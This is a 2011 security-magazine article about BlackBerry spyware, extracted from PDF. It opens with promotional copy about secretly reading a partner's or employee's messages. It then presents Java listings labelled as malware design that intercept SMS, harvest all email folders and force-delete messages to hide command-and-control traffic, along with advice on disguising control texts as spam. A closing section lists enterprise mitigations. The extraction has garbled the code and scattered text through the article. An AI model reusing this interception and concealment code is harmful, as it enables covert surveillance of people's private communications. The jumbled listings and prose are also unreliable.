The Backroom Message That’s Stolen Your Deal

ATTACK The Backroom Message That’s Stolen Your Deal Do you want to learn more about bigwig? Is someone keeping secrets from you? Need to silently record text messages, GPS locations and call info of your child or employee? Catch everybody at whatever you like with our unique service. What you will learn… What you should know… • Each email-message (or sms-message) as part term of business correspondence could be intercept • Message can activate spyware • Basic knowledge about BlackBerry security I t lets you to intercept SMS or Email messages via the Internet, catch cheating wives or cheating husbands, stop employee espionage, protect children, etc. Well, you’ve just read yet another advertising that summarized several spyware products for every mobile OS. To be beyond exception that Windows Mobile, Symbian, iOS (iPhone) are the most popular with consumer. All of kind has never had a distinct security policy. But the BlackBerry devices are one of world’s top devices! It’s entirely explicable, though. There’s unique thing is defensible. It has a proof-of-security flow channel to transmit data from each to other. And up to now, there’s no successful decoder for ciphered technology. These days a lot of people are in use of a mobile phone, it has made our lives easier and increased communication, in spite of opportunity for a cheating. You suppose your lover isn’t being faithful to you and you ought to grant your suspicions or allay your fears. So, the main of evidence can be new lover is linked with your partner. Telltale signs will be sms to the same number, late at night or early in the morning or both, if the same number is appearing as a call at unsocial hours then you really have something to be concerned about. However there can be a perfectly innocent explanation for activity like this and its worth pausing before jumping to conclusions. If the number that is appearing is that of a family member or good friend it 22 might just be that your partner is planning a surprise for you and has enlisted their help, so check the number carefully, particularly if it seems familiar to you. Nothing personal... Everyone knows that reading other people’s letters or diaries, without the permission of the author isn’t ethical. All personal correspondence, or even just information such as SMS messages, address book, email, ICQ history, indeed are called for fashionable word Privacy, or a Private, Data Privacy. Any attempt to cheat with it behind author back is a direct violation of the individual privacy. One day, everyone has thought about what men write to each other, or what was written by his friend or colleagues. It’s no necessarily malicious intent. Do they have something to hide, to hatch a plot? Omnivorous curiosity is one of the most popular human vice helps to fraudster to earn considerable sums of money every day. They always ready to help to get into somebody address phone book, email message or social networking pages for all comers. After all do you can get access to cherished friend’s (lover’s, boss, foes) chats? The victim’s mobile phone is coveted human’s goal. This storage place may shed light on wrapped in mystery things. There’s no way to read others emails or sms. You can take phone and read all you interested 04/2011 The backroom message that’s stolen your deal in. It’s one of the easiest ways to do. By the way, you may to provoke your victim into allowing acquainting yourself with privacy data. It should be noted that lack of knowledge is leading topics of the hour. Now the plot thickens in call for a vote of confidence! Really, how long does software ask you to grant with privacy data? Do you trust software with yourself secrets? Take some kind of program modifying sms&email graphical controls, for instance. When you’re going to install it you’ve been asking to set access permission (as general permission), send&receive permission, etc. There is no reason for concern in this case, right? You install what you like despite expectancy of data stealing. If we take a Facebook application (or twitter application) then confidence level should be reduced because such kind of apps has http/https via EDGE/ 3G/WiFi as common channel to data transmission. Further to there’s ability to receive actual information about new friends or upload status by sms sending. For some time past, internet spreads a spam with a proposal to use the service to read others’ posts. Kaspersky Lab reported about one of these viruses in February, 2009. Users are promised the ability to read others SMS. By clicking on the junk link users downloaded a Trojan called Trojan.Win32.Agent2.dbq (Kaspersky Lab’s Notation). The next secret (cherished) zone area is a personal email storage. Email correspondence goes mad not less than others sms. Deceivers are offering password email account’s breaking services. At first, they also ask for upfront payment via SMS and never break into account. There’s another kind of deception. Someone imparts news about security holes of Google email system or Yahoo email system and offers to get the password from any mailbox. There is a need for you to send to the referred above email address your (!) password and answer for secret question (what’s your favourite colour?). It accounts for by cheating the email system (Google, Yahoo). After all, you’ll supposedly receive a list of password to any email system. Come again! It’s easy substitution of your account’s password for desired password. So, there’s no fraud! Really, there are a lot of security holes (but it’s just a one kind of it); really, there’s a way to steal password. Are ready to name this hole? Nobody but you! The email address in received message is just an intruder email account. This way he gets other’s password. Also he doesn’t want anyone to confide in. Thus, all proposals for access to others’ correspondence have two goals. Trick the user out of money or infect user’s computer with a virus. In this case, the attacker could also capture the user’s own password. www.hakin9.org/en Routines behind the screen... The message (sms or email) intercept is a great opportunity to take control of somebody and be invisible. You’re able to read emails as well as make a telephone directory (subscriber’s list) through the text messages to a minute. Such kind of message intercept is in demand on the situation. Moreover, it’s a real ability to feel a spy likewise to obtain information that can’t be get in a legal way. Some years ago such intercepts were a science fiction available for intelligence service. Up to now, you don’t be secret serviceman; you don’t have a high level of experience. The explanation was quite simple. You only need to hit him with your legacy hammer. There’s no way of misapplication of hummer, isn’t it? You can hammer a nail into board, or you also can hammer a nail into smb head. There is nothing reprehensible about it. The public tranquillity as protectability is wrong side of vulnerability. And vice versa. Malware Design Ultimate goal is show what API-routines help us to design such malware. List of API classes is shall be import to recreate sms listener is presented in Listing 1. The first public class Date represents a specific instant in time, with millisecond precision. Listing 1. API-routines to design malware's part “sms intercept” java.util.Date; javax.wireless.messaging.MessageConnection; javax.wireless.messaging.Message; Listing 2. Retrieve the message MessageConnection sms_connection = (MessageConnectio n)Connector.open("sms://:0"); ; Message sms_message = sms_connection.receive(); Date sms_date = sms_message.getTimestamp(); String sms_address = sms_message.getAddress(); String sms_body = null; if (m instanceof TextMessage) { } TextMessage temp_text = (TextMessage)sms_message; sms_body = temp_text.getPayloadText(); else if (m instance of BinaryMessage) { byte[] temp_byte = ((BinaryMessage) sms_message). getPayloadData(); // convert Binary Data to Text } sms_body = new String(temp_byte, "UTF-8"); 23 ATTACK Interface Message is the base interface for derived interfaces that represent various types of messages. This interface contains the functionality common to all messages. We have a couple routines here. – Returns the address associated with this message. If this is a message to be sent, then this address is the recipient’s address. If this is a message that has been received, then this address is the sender’s address. getTimestamp() – Returns the timestamp indicating when this message has been sent. • getAddress() • Listing 3. API-routines to design malware's part “email intercept” import net.rim.blackberry.api.mail.Address; import net.rim.blackberry.api.mail.Folder; import net.rim.blackberry.api.mail.Message; import net.rim.blackberry.api.mail.Session; import net.rim.blackberry.api.mail.Store; Folder INTEGER Constants ce(); • • • • • • • String email_from = null; • String email_body = null; • • Listing 4. Retrieve a email message” Session current_session = Session.getDefaultInstan String folders_name = null; String email_subject = null; if (current_session != null) { Store current_storage = current_ session.getStore(); Folder[] list = current_storage.list(); for (int i = 0; i < list.length; i++) { folders_name = folder.getFullName(); //get folder's name Message[] msgs = list[i].getMessages(); for (int n=0; n < msgs.length; n++) { Address from = msgs[n].getFrom(); if (from != null) } email_from = from.getAddr(); email_subject = msgs[n].getSubject(); } 24 The MessageConnection interface defines the basic functionality for sending and receiving messages. It contains methods for sending and receiving messages. The receive() subroutine which receives a message. If there are no messages for this MessageConnection waiting, this method will block until either a message for this Connection is received or the MessageConnection is closed. When an incoming message arrives, the notifyIncom ingMessage(MessageConnection) method is called. There’s a the same method for outcoming message notifyOut comingMessage(MessageConnection) that is called when an SMS message is sent from the device. Both of methods are called once for each incoming message to the MessageConnection. The second malware part is designed to catch email messages. In this case, It should be used another signed routine set which is described in Listing 3. } } email_body = msgs[n].getBodyText(); – A Folder containing deleted messages. – A Folder containing draft messages. FILED – Contains items that are �led in a Folder. INBOX – A Folder containing received messages. INVALID – A Folder containing items marked as invalid. JUNK – A Folder for junk mail. OTHER – A Folder that the user created – a personal folder. OUTBOX – A Folder containing messages in the process of being sent. SENT – A Folder containing sent messages. UNFILED – Contains items that are not currently �led in a Folder. DELETED DRAFT The Session class provides access to email services, storage, and transport. The Message class represents an email message. A message contains a set of header fields (attributes) and a body (contents). Messages in a folder also have a set of flags that describe its state within the folder. Received messages are retrieved from a folder named INBOX (see Folder integer constants). The Folder class represents a mailbox folder on the handheld. To retrieve a list of contained folders only call Folder.list(). But we don’t need anything about folder’s contants or system folder’s names, If we need to extract folder’s name it should routine’s called by getFullName(). By the way, it’s simple to use a cycle for (int i = 0; i < email_folder_list.length; i++) because we’ve already got email’s folder list by calling Folder.list(). The Message class represents a message store and its access protocol, for storing and retrieving messages on the handheld. To retrieve a Store instance to access message storage on this device we need to invoke Session.getStore(). 04/2011 The backroom message that’s stolen your deal Refers to code above I notice that I rewrite 4 strings’ objects: folders_name, email_from, email_subject, email_body. To data acquisition you should use the Vector object like „Vector data_acq = new Vector() from java.util.Vector and then create a String object by Utils.makeStringFrom Vector converting data. By the way, you also can use a StringBuilder. Stolen messages from blackberry device Sender :: InternetSMS Body :: http://www.blackberryseeker.com/applications/download/ PDF-To-Go-V20_2.aspx Sender :: InternetSMS Body :: http://letitbit.net/download/.../Defcon14-V64-X30n-Black jacking_Owning_the_enterprise.m4v.html Puppet theatre Progress is interesting to watch. It is in every area of human activity, else it vanishes from sight. The cybercrime is beyond exception, too. It rapidly improves which is used by his own inhabitants. The malware 2.0 is a new word in the IT Security vocabulary since 2006. This term describes the new generation of malicious software because it well co-ordinated and wellfunctioning system. By the way, it poisons anti-viruses existence. Trojans are malicious programs that perform actions which are not authorized by the user: they delete, block, modify or copy data, and they disrupt the performance of computers or computer networks. Unlike viruses and worms, the threats that fall into this category are unable to make copies of themselves or self-replicate. Trojans are classified according to the type of action they perform on an infected computer. This subclass includes the following behaviors according to Kaspersky Lab: • • • • • • • • Backdoor Exploit Rootkit Trojan-DDoS Trojan-Downloader Trojan-Proxy Trojan-SMS Trojan-Spy, etc Figure 1. Application Management The most interesting subclass is Backdoor and TrojanDDoS ”. The second subclass will be attended to article later on. And now we discuss a backdoor’s behavior. Well, Backdoors are designed to give malicious users remote control over an infected computer. So, it’s similar to many administration systems designed and distributed by software developers. These types of malicious programs make it possible to do anything the intruder wants on the infected handheld: send and receive files, launch files or delete them, display messages, delete data, etc. The programs in this category are often used in order to unite a group of victim computers and form a botnet or zombie network. This gives malicious users centralized control over an army of infected computers which can then be used for criminal purposes. Listing 5. Delete a email message” Import net.rim.blackberry.api.mail.Folder … Message[] emailMessage= emailFolder.getMessages(); for(int i=0;i<emailMessage.length;i++) { } emailFolder.deleteMessage(emailMessage[i],true); www.hakin9.org/en Figure 2. Set application’s permission 25 ATTACK Unfortunately, RIM API does not allow to access already received/sent sms-messages. In spite of it, it still possible to mask our control command to the some kind of spam, e.g. +323232 User MegaFriend has sent message to you. Isn’t it a Facebook notify? It doesn’t matter much that such sms has another sender number; it’s a matter that your device have been received a control message. Mitigation Figure 3. Firewall Management Most popular message’s control is sms (or mms). SMS advantage is rapid access, steadiness, reliability assurance. In BlackBerry’s case email is a second sufficient channel is capable of the same rapidly moving events. The way how to catch sms or email messages I discuss above. So, if we’re going to create powerful command control system (further CC) we need know how to delete this message. Below is part of the codes as way to delete all the email (see Listing 5). The boolean value .deleteMessage(...,true) indicates force deletion If the message is marked as saved. If you’ve just caught an email message by using FolderEvent(Folder with folder, int Message msg = e.getMessage(); } msg.deleteMessage(...). Figure 4. Exception’s of black list 26 type, Message message) synchronized void messagesAdded(FolderEvent event) { then you can delete it by BlackBerry Enterprise Server has several to mitigation. First, you can turn on confirmation of each sending message for cases that blackberry Trojan has ability to spend money and you have to pay the bill. This rule is placed in IT Policy>Common Policy Group>Confirm On Send. If you even set it into True value this rule exerts an impact only on user’s actions. In other words, any kind of program has never notified you when sends message. It also could set a trusted applications in Application Control>Message Access. One more a radical solution consist in disabling SMS and MMS on IT Policy>Device Only Items>Allow SMS and “IT Policy>Common>Disable MMS. The first feature may be set in False state, and the second may be set into True value. More powerful way is to create a trusted domain. This ability provides us to fill a white list with trusted senders and recipients and to filter a black list of phrases, senders, recipients. First of all, you should check and turn on your BES filter’s status: IT Policy>Security>Firewall Block Incoming Messages. Here it should be checked a SMS, MMS, Enterprise Message as filtered types. Enterprise Message is none of than a enterprise email messages. After it, fill a whitelist in IT Policy>Security>Firewall White List Address with e.g. *@blackberry.enterprise.com. Take Figure 5. Adding new exception 04/2011 The backroom message that’s stolen your deal On the ‘Net • • • • • • • • http://docs.blackberry.com/en/admin/deliverables/12063/BlackBerry_Enterprise_Server-Policy_Reference_Guide-T323212-8320261023123101-001-5.0.1-US.pdf – BlackBerry Enterprise Server Version: 5.0. Policy Reference Guide, RIM, http://docs.blackberry.com/en/developers/deliverables/11961/BlackBerry_Java_Application-Feature_and_Technical_Overview-789336-1109112514-001-5.0_Beta-US.pdf – BlackBerry Java Application. Version: 5.0. Feature and Technical Overview, RIM http://docs.blackberry.com/en/developers/deliverables/9091/JDE_5.0_FundamentalsGuide_Beta.pdf – BlackBerry Java Application. Version: 5.0. Fundamentals Guide , RIM, http://www.blackberry.com/knowledgecenterpublic/livelink.exe/fetch/2000/8067/645045/8655/8656/1106255/BlackBerry_ Application_Developer_Guide_Volume_1.pdf?nodeid=1106256&vernum=0 – BlackBerry Application Developer Guide Volume 1: Fundamentals (4.1), RIM, http://www.blackberry.com/knowledgecenterpublic/livelink.exe/fetch/2000/8067/645045/8655/8656/1106255/BlackBerry_ Application_Developer_Guide_Volume_2.pdf?nodeid=1106444&vernum=0 – BlackBerry Application Developer Guide Volume 2: Advanced Topics (4.1), RIM, http://www.blackberry.com/developers/docs/4.2api/ – RIM Device Java Library – 4.2.0 Release (Javadoc), RIM, http://docs.blackberry.com/en/developers/deliverables/15497/BlackBerry_Smartphone_Simulator-Development_Guide--10019260406042642-001-5.0-US.pdf – BlackBerry Smartphone Simulator. Version: 5.0. Development Guide, RIM, http://docs.blackberry.com/en/developers/deliverables/1077/BlackBerry_Signing_Authority_Tool_1.0_-_Password_Based_-_ Administrator_Guide.pdf – BlackBerry Signature Tool 1.0. Developer Guide, RIM notice of using a substitution characters like asterisk “*”. You also can add another values separated with comma. First step is done, you’ve just create a trusted domain filled with only white addresses. The second step is filling black tags. First of all, you should turn option, too. The rule IT Policy>Filter Rule> Condition and Action>Enabled is set into True state switches to strain your emails. The second rule IT Policy>Filter Rule>Condition and Action>From gives opportunity to vanish message from unknown senders. Here you can type something like [email protected], [email protected]. The same rule IT Policy>Filter Rule>Condition and Action>Sent To can filter vulnerable message that can include stolen data to intruder account or non-trusted account. To control transfer subjects and bodies set unallowable phrases to following rules: IT Policy>Filter Rule>Condition and Action>Subject, IT Policy>Filter Rule>Condition and Action>Body. After it, you have to check a last rule that indicate way of delivering black messages. In first case, device is receiving only headers, in second case BES holding such messages don’t allow to device download it. If you are BIS consumer you always check permissions when downloading an application to grant or disallow status to email or sms. Or you can set it after you downloaded application in Options>Device>Applic ation Management>Edit Permissions. To fill a white list with enabling a device firewall you should to follow Op tions>Security>Firewall, check desirable features and add white rule. Conclusion Spyware is one of the most common types of malware. While the term spyware suggests software that secretly monitors the user’s computing, the functions www.hakin9.org/en of spyware extend well beyond simple monitoring. It’s designed to spy what you’re doing on your device. They collect information about Web pages you usually visit, your Internet surfing habits and messages you exchange. It also interfere with user control of the computer in other ways, such as installing additional software and redirecting Web browser activity or theft of personal information (including financial information such as credit card numbers). Then it sends without your knowledge to others. However, to install they have to hide themselves in demo games as example. The presence of spyware is typically hidden from the user, and can be difficult to detect. It’s not very common, it’s not an amount of viruses, Trojans, backdoors that antiviruses can stop, and otherwise everybody will know it. Like many recent viruses, however, spyware by design spyware exploits infected computers for commercial gain. Even you think your information isn’t important to intruder, they can use your device resources again others or steal data won’t never let you know about it. By the way, they foul the trail and left your device (and you) holding the baby. YURY CHEMERKIN Graduated at Russian State University for the Humanities (http://rggu.com/) in 2010. At present postgraduate at RSUH. Information Security Analyst since 2009 and currently works as mobile info security researcher in Moscow. E-mail: [email protected]. Facebook: http://www.facebook.com/people/Yury-Chemerkin/ 100001827345335. LinkedIn: http://ru.linkedin.com/pub/yury-chemerkin/2a/434/ 549 27